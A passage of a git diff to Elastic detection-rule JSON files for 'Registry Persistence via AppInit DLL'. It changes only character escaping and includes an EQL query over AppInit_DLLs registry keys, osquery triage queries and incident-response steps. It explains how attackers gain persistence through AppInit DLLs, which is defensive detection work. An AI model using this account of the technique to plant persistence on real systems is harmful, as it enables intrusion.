and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - $osquery_0\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_1\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_2\n - $osquery_3\n - $osquery_4\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_103.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_103.json index 50f7963c98d..0e8f2bd6b87 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_103.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_104.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_104.json index ac950555abe..8476ecb241f 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\"\n ) and not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", "related_integrations": [ { @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_105.json b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_105.json index 15f5213367a..a421d8b01d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d0e159cf-73e9-40d1-a9ed-077e3158a855_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Triage and analysis\n\n### Investigating Registry Persistence via AppInit DLL\n\nAppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications.\n\nAttackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine.\n\nThis rule identifies modifications on the AppInit registry keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related DLL file tied to the Windows Registry entry.\n - Check whether the DLL is signed, and tied to a authorized program used on your environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve all DLLs under the AppInit registry keys:\n - !{osquery{\"label\":\"Osquery - Retrieve AppInit Registry Value\",\"query\":\"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows' or\\nr.key == 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows') and r.name ==\\n'AppInit_DLLs'\\n\"}}\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and the DLLs using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 